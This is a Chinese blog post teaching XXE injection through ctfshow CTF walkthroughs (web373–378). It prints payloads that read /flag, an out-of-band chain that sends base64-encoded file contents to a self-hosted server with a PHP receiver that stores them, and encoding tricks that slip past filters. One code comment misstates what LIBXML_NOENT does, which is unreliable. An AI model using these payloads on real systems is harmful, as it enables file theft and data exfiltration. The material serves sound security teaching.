XXE漏洞知识及ctfshow例题

2024-03-30 20:28
文章标签 漏洞 例题 知识 ctfshow xxe

本文主要是介绍XXE漏洞知识及ctfshow例题,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

XXE漏洞相关知识

XXE全称为XML Enternal Entity Injection 中文叫xml外部实体注入

什么是xml

简单了解XML:

(xml和html的区别可以简易的理解成:xml是用来储存数据和传输数据的而html是用来将数据展现出来)

XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构 语法:

XML元素都必须有关闭标签 XML 标签对大小写敏感 XML 必须正确地嵌套 XML 文档必须有根元素 XML 的属性值须加引号 结构:

XML 文档声明,在文档的第一行 XML 文档类型定义,即DTD,XXE 漏洞所在的地方 XML 文档元素 例子:

<?xml version="1.0" encoding="UTF-8"?><!--说明了xml文档的版本还有编码类型 经常出现在xml文档的开头-->
<userConfig><user><username>john_doe</username><password>secretpassword</password><language>en_US</language><theme>dark</theme></user><user><username>jane_smith</username><password>anotherpassword</password><language>fr_FR</language><theme>light</theme></user>
</userConfig>

在xml文档中注释是使用<!--注释-->进行注释

以上是一个简单的xml文档其中的<userConfig>元素中嵌套着<user>;<user>中嵌套着<username> <password> <language> <theme>这些元素

而这些元素其中的jane_smith则为这个xml文档中储存的数据

为什么都有数据库了还要用xml来储存数据 :我个人认为是因为数据库对于我们来说可读性不高因为可能都是经过加密或者编码后的而xml相对来说可读性就很高便于人识别,经常用来当作配置文件

以下是一些使用 XML 的情况:

  1. 数据交换格式:XML 是一种通用的数据交换格式,在不同系统之间传递数据时非常有用。许多 Web 服务和 API 使用 XML 作为数据格式来传输数据。

  2. 配置文件:XML 被广泛用于配置文件中,例如在 Web 应用程序、桌面应用程序和服务器软件中。XML 的结构化特性和可读性使其非常适合用于表示配置信息。

  3. 文档存储:对于一些具有层次结构的数据,如文档、报告或配置文件,XML 可以提供一种简单的、易于理解的存储格式。某些情况下,将这些数据存储为 XML 文件可能比使用数据库更合适。

  4. 面向文本的数据:如果数据的主要形式是文本,而不是结构化数据,那么将其存储为 XML 文件可能更加合适。XML 具有自我描述性,因此即使在没有其他说明的情况下,也可以轻松地理解数据的结构和内容。

  5. 支持分散的数据存储:在一些分散式系统中,每个组件都可能需要维护自己的数据存储。在这种情况下,XML 可以作为一种轻量级的、独立的数据存储格式,允许每个组件在不依赖中央数据库的情况下管理自己的数据

DTD(文档类型定义)

dtd通常在xml文档中在 XML 中,可以使用 DTD 来定义以下内容:

  1. 元素的结构和关系:DTD 可以定义 XML 文档中的元素以及它们之间的层次结构和关系。这包括定义元素的名称、元素可以包含的子元素、子元素的顺序和数量等信息。

  2. 元素的属性:DTD 可以定义元素可以具有的属性,包括属性的名称、数据类型、取值范围等信息。

  3. 实体:DTD 还可以声明实体,用于在 XML 文档中定义可重复使用的文本片段或字符。这样可以使 XML 文档更具可读性和可维护性。

  4. CDATA 部分:DTD 可以定义 CDATA(Character Data,字符数据)部分,用于包含文本数据而不进行 XML 解析。CDATA 部分通常用于包含特殊字符或者大段文本数据。

通过使用 DTD,可以为 XML 文档定义结构和约束,以确保文档的有效性和一致性。DTD 可以内联在 XML 文档中,也可以作为单独的文件引用

例:

<!DOCTYPE bookstore [<!-- 定义书籍元素 括号中是book元素的子元素 --><!ELEMENT book (title, author, year, price)><!-- 定义标题元素 其中#PCDATA表示这些元素可以包含文本数据 --><!ELEMENT title (#PCDATA)><!-- 定义作者元素 --><!ELEMENT author (#PCDATA)><!-- 定义出版年份元素 --><!ELEMENT year (#PCDATA)><!-- 定义价格元素 --><!ELEMENT price (#PCDATA)><!-- 定义书店元素 --><!ELEMENT bookstore (book+)>
]>

DTD声明

dtd声明可以分为外部声明和内部声明

外部声明:

<!DOCTYPE note SYSTEM "flag.php">

其中的SYSTEM可以理解成他会把在它后边的内容理解成一个合法的系统标识,从而找到文件的位置

内部声明:

<!DOCTYPE bookstore [<!ELEMENT bookstore (book*)> <!-- 其中的*表示一个或多个book元素 --><!ELEMENT book EMPTY><!-- 其中的EMPTY表示book是一个空元素 --><!ATTLIST bookid ID #REQUIREDtitle CDATA #IMPLIED>
]>

实体

内部实体:<!ENTITY 实体名称 "实体值">

例:

<!DOCTYPE article [<!ENTITY title "Introduction to XML"><!ENTITY author "John Doe"><!ENTITY date "2024-03-26">
]>
<article><title>&title;</title><author>&author;</author><date>&date;</date><content><!-- 文章内容 --></content>
</article>
​

外部实体:<!ENTITY 实体名称 SYSTEM "外部文件URI">

假设我们有一个包含很多实体的外部 XML 文件 entities.xml,它定义了一些常用的术语如下:

<!DOCTYPE entities [<!ENTITY term1 "XML"><!ENTITY term2 "HTML"><!ENTITY term3 "CSS">
]>

现在我们可以在另一个 XML 文档中引用这个外部实体文件,并且重复使用其中定义的术语如下:

<!DOCTYPE article SYSTEM "entities.xml">
<article><title>Introduction to &term1;</title><content>&term1; is a markup language used for structuring and presenting content on the web.&term2; is another markup language commonly used in web development.&term3; is a style sheet language used for describing the presentation of a document written in a markup language.</content>
</article>

ctfshow例题

web 373

源码解析:

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
//以上是注释不用管
​
error_reporting(0);//禁用错误报告
libxml_disable_entity_loader(false);//可以使用实体加载器;如果将false改为ture那么将禁用实体加载器
​
//以下这个点将会成为我们注入的关键
​
$xmlfile = file_get_contents('php://input');//从输入流中获取
if(isset($xmlfile)){$dom = new DOMDocument();//创建了一个DOMDocument对象$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);//这行代码加载 XML 数据到 DOMDocument 对象中。LIBXML_NOENT 和 LIBXML_DTDLOAD 是解析选项,用于控制解析器的行为。其中,LIBXML_NOENT 用于防止实体替换,LIBXML_DTDLOAD 用于允许加载 DTD$creds = simplexml_import_dom($dom);//这行代码将 DOMDocument 对象转换为 SimpleXMLElement 对象 这样可以更简单的对数据进行处理$ctfshow = $creds->ctfshow;//寻找数据中的ctfshow元素或者实体echo $ctfshow;//将其输出
}
highlight_file(__FILE__);//高亮显示这个文档的代码    
​

有以上的代码可以知道我们需要在传入的数据中有实体并且这个实体存在于元素ctfshow中开始构造:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe[<!ENTITY hack SYSTEM "file:///flag">
]>
<H3rme><ctfshow>&hack;</ctfshow>
</H3rmes>
注意:

对于DOCTYPE和ENTITY的拼写一定要注意不要拼写错误了还有file://后表示访问本地文件的路径/表示根目录 我试过./不行表示当前文件夹

还有一点元素ctfshow一定要直接放到根元素下这样才能被直接访问到 我试过加一个元素嵌套或者直接把ctfshow作为根元素但是不行这样会导致它不能直接的正确地解析到直接在根元素下的元素

这些问题都会直接导致无法正确的输出flag

操作如图:

屏幕截图 2024-03-27 214354

以上是改包直接在bp中看response

也可以直接改包发包然后在浏览器中看flag 如图:

屏幕截图 2024-03-27 214449

实体替换:

举个例子:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example[<!ENTITY hello "Hello, World!">
]>
<root><greeting>&hello;</greeting>
</root>

以上代码中的&hello会被替换成Hello,world这便是实体替换

但是以下代码中的实体是指路径不是具体的值所以并不能算实体替换

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe[<!ENTITY hack SYSTEM "file:///flag">
]>
<H3rmesk1t><ctfshow>&hack;</ctfshow>
</H3rmesk1t>

web374

源码:

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  

经过和第一关的对比发现这关比上一关少一些代码

 $creds = simplexml_import_dom($dom);$ctfshow = $creds->ctfshow;echo $ctfshow;

也就是说这关无法将我们想要的flag输出因此我们不能再试图从页面中得到flag可以试试去将其中的flag输出到其他地方 比如:通过一个网址将其输入到对应的服务器上

(前提要有一个公网ip也就是需要一个服务器操作系统要centos [推荐学生可以去免费领几个月:ECS云服务器学生权益] 然后下载宝塔这样便于我们对根目录的文件进行操作 相关教程可以去网上搜 )注意:在操作的时候要注意的几个点:

image-20240329151425106

新建的时候这样操作可以直接通过这个ip来访问而且也可以对其的根目录文件操作,同时不需要再去购买域名

还有一点:

屏幕截图 2024-03-29 130659

如果重启web服务器而且各种办法都没有办法解决的话可以去试试换个浏览器 (亲测有奇效)

然后开始做题:

首先在我们在宝塔中所创建的网站的根目录下创建两个文件

如图:

image-20240329152235339

image-20240329152312752

xxe.xml:

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://填自己创建的网站的ip/1.php?file=%file;'> ">
%dtd;
%xxe;

这行代码使用了两个实体参数&#x25;就是一个html实体编码和%一样 它的作用是当xml解析器解析是会去访问http://填自己创建的网站的ip/1.php?file=%file从而会通过get传参将参数%file中的内容输入到这个网站对应的目录中

1.php:

<?php 
file_put_contents("test.txt", $_GET['file']) ; 
?>

和以上代码搭配使用将file的内容传入到文件test.txt中

然后payload:

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://填自己创建的网站的ip/xxe.xml">
%aaa;
]>
<root>123</root>
<!--以上代码同样也主要是实体参数 可以看出参数%file的内容是经过base64编码后的flag(php://filter 是封装器,用于对数据进行过滤和处理)然后先声明%aaa 然后通过%aaa进行访问到xml文件从而将参数%file成功传入再通过后端php最后会出现一个新文件test.txt里面的内容便是经过base64编码后的flag 
在这里因为flag中存在特殊字符在传输的时候可能会导致出现错误所以进行了base64编码-->

如图:

image-20240329161102352

然后刷新宝塔发现新出现了一个test.txt

如图:

image-20240329161226302

然后将里面的内容进行base64解码 在线解码工具:Base64 解码和编码 - 在线

如图:

屏幕截图 2024-03-29 161404

屏幕截图 2024-03-29 161434

完成!

web375

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:22:05
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){die('error');
}
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    
​

本关是在上一关的基础上又加了一个正则匹配<?xml version="1.0"?>

我们只需要把上一关的xxe.xml改成xxe.dtd

还有payload也要相应的改变一下

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://填自己创建的网站的ip/xxe.dtd">
%aaa;
]>
<root>123</root>

其余操作不变

如图:

屏幕截图 2024-03-29 164653

屏幕截图 2024-03-29 164717

屏幕截图 2024-03-29 164728

屏幕截图 2024-03-29 165021

解决!

也可以通过大写.XML来绕过

web 376

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:23:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){die('error');
}
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);   

这关只是在正则匹配上做了一些改变 变成了正则匹配的时候不区分大小写

直接拿上一关的方法做即可!

web 377

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:26:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
*/
​
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){die('error');
}
if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

这一关在前两关的基础上又加了不区分大小写的过滤http

使用utf-16编码http即可其他的一模一样

在实战中因为burp不能使用半角字符所以只能使用编码

一个个试即可:

整体简述
在开始之前,我想先简单说一下
在浏览器的地址栏中输入url,发送http请求头(涉及tcp/ip/dns)
http://example.com/test.php
远程的web服务器(apache/iis等)接收到url,分析请求头,根据它找到对应资源,返回一个响应头和数据
​
可以被浏览器解析的编码:
unicode编码:(utf-8,utf-16,utf-32)
​
url编码
html编码

web 378

如图:

image-20240329213931516

先输入点东西抓包看看 如图:

屏幕截图 2024-03-29 213327

发现输入的内容直接出现在了元素中 那我们在前面加上一个实体声明(内容要指向flag的路径)再在后面的元素中引用这个实体便可以将flag输出

直接构造payload:

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

123无所谓什么都可以但是其他的不能变逻辑原理就是:一个内容要指向flag的路径的实体声明 再在后面的元素中引用这个实体 便可以将flag输出

如图:

屏幕截图 2024-03-29 213556

OVER!

其实当我看到输入的内容出现在元素中的时候我其实第一想到的是xss但是试了一下发现压根不行又看了一下 页面源代码发现压根不存在注入所以burp所抓的发送包是经过后端源码

这篇关于XXE漏洞知识及ctfshow例题的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/862496

相关文章

Java架构师知识体认识

源码分析 常用设计模式 Proxy代理模式Factory工厂模式Singleton单例模式Delegate委派模式Strategy策略模式Prototype原型模式Template模板模式 Spring5 beans 接口实例化代理Bean操作 Context Ioc容器设计原理及高级特性Aop设计原理Factorybean与Beanfactory Transaction 声明式事物

sqlite3 相关知识

WAL 模式 VS 回滚模式 特性WAL 模式回滚模式(Rollback Journal)定义使用写前日志来记录变更。使用回滚日志来记录事务的所有修改。特点更高的并发性和性能;支持多读者和单写者。支持安全的事务回滚,但并发性较低。性能写入性能更好,尤其是读多写少的场景。写操作会造成较大的性能开销,尤其是在事务开始时。写入流程数据首先写入 WAL 文件,然后才从 WAL 刷新到主数据库。数据在开始

系统架构师考试学习笔记第三篇——架构设计高级知识(20)通信系统架构设计理论与实践

本章知识考点:         第20课时主要学习通信系统架构设计的理论和工作中的实践。根据新版考试大纲,本课时知识点会涉及案例分析题(25分),而在历年考试中,案例题对该部分内容的考查并不多,虽在综合知识选择题目中经常考查,但分值也不高。本课时内容侧重于对知识点的记忆和理解,按照以往的出题规律,通信系统架构设计基础知识点多来源于教材内的基础网络设备、网络架构和教材外最新时事热点技术。本课时知识

【Python知识宝库】上下文管理器与with语句:资源管理的优雅方式

🎬 鸽芷咕:个人主页  🔥 个人专栏: 《C++干货基地》《粉丝福利》 ⛺️生活的理想,就是为了理想的生活! 文章目录 前言一、什么是上下文管理器?二、上下文管理器的实现三、使用内置上下文管理器四、使用`contextlib`模块五、总结 前言 在Python编程中,资源管理是一个重要的主题,尤其是在处理文件、网络连接和数据库

dr 航迹推算 知识介绍

DR(Dead Reckoning)航迹推算是一种在航海、航空、车辆导航等领域中广泛使用的技术,用于估算物体的位置。DR航迹推算主要通过已知的初始位置和运动参数(如速度、方向)来预测物体的当前位置。以下是 DR 航迹推算的详细知识介绍: 1. 基本概念 Dead Reckoning(DR): 定义:通过利用已知的当前位置、速度、方向和时间间隔,计算物体在下一时刻的位置。应用:用于导航和定位,

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

【H2O2|全栈】Markdown | Md 笔记到底如何使用?【前端 · HTML前置知识】

Markdown的一些杂谈 目录 Markdown的一些杂谈 前言 准备工作 认识.Md文件 为什么使用Md? 怎么使用Md? ​编辑 怎么看别人给我的Md文件? Md文件命令 切换模式 粗体、倾斜、下划线、删除线和荧光标记 分级标题 水平线 引用 无序和有序列表 ​编辑 任务清单 插入链接和图片 内嵌代码和代码块 表格 公式 其他 源代码 预

图神经网络(2)预备知识

1. 图的基本概念         对于接触过数据结构和算法的读者来说,图并不是一个陌生的概念。一个图由一些顶点也称为节点和连接这些顶点的边组成。给定一个图G=(V,E),  其 中V={V1,V2,…,Vn}  是一个具有 n 个顶点的集合。 1.1邻接矩阵         我们用邻接矩阵A∈Rn×n表示顶点之间的连接关系。 如果顶点 vi和vj之间有连接,就表示(vi,vj)  组成了

JAVA初级掌握的J2SE知识(二)和Java核心的API

/** 这篇文章送给所有学习java的同学,请大家检验一下自己,不要自满,你们正在学习java的路上,你们要加油,蜕变是个痛苦的过程,忍受过后,才会蜕变! */ Java的核心API是非常庞大的,这给开发者来说带来了很大的方便,经常人有评论,java让程序员变傻。 但是一些内容我认为是必须掌握的,否则不可以熟练运用java,也不会使用就很难办了。 1、java.lang包下的80%以上的类

JAVA初级掌握的J2SE知识(一)

时常看到一些人说掌握了Java,但是让他们用Java做一个实际的项目可能又困难重重,在这里,笔者根据自己的一点理解斗胆提出自己的一些对掌握Java这个说法的标准,当然对于新手,也可以提供一个需要学习哪些内容的参考。另外这个标准仅限于J2SE部分,J2EE部分的内容有时间再另说。 1、语法:必须比较熟悉,在写代码的时候IDE的编辑器对某一行报错应该能够根据报错信息知道是什么样的语法错误并且知道